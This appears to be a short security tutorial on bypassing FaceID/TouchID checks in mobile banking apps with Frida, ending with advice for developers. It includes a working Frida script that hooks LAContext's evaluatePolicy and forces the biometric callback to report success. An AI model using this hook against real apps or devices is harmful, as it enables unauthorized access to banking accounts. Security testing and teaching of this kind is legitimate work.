FaceID and TouchID have become standard for securing mobile banking applications. However, the security of these implementations depends heavily on how the app handles the "fallback" mechanism when biometrics fail.
Frida allows us to inject snippets of JavaScript into native apps on iOS and Android. This is incredibly powerful for bypassing security checks in real-time without needing to modify the app binary on disk.
Many apps use simple boolean checks to determine if biometric authentication was successful. Using Frida, we can hook the method responsible for this check and force it to always return 'true'.
// Frida script to bypass biometric check
if (ObjC.available) {
var hook = ObjC.classes.LAContext['- evaluatePolicy:localizedReason:reply:'];
Interceptor.attach(hook.implementation, {
onEnter: function(args) {
var reply = new ObjC.Block(args[4]);
const callback = reply.implementation;
reply.implementation = function(success, error) {
console.log("Forcing success: true");
return callback(true, null);
};
}
});
}
Advanced implementations use the Secure Enclave and Keychain to protect sensitive data. Bypassing these requires more sophisticated techniques, such as hooking the LocalAuthentication framework or manipulating the app's state machines.
Developers should use 'LocalAuthentication' correctly and never rely solely on a boolean return value for critical security decisions. Proper implementation involves using 'LAPolicyDeviceOwnerAuthenticationWithBiometrics' and handling the results securely.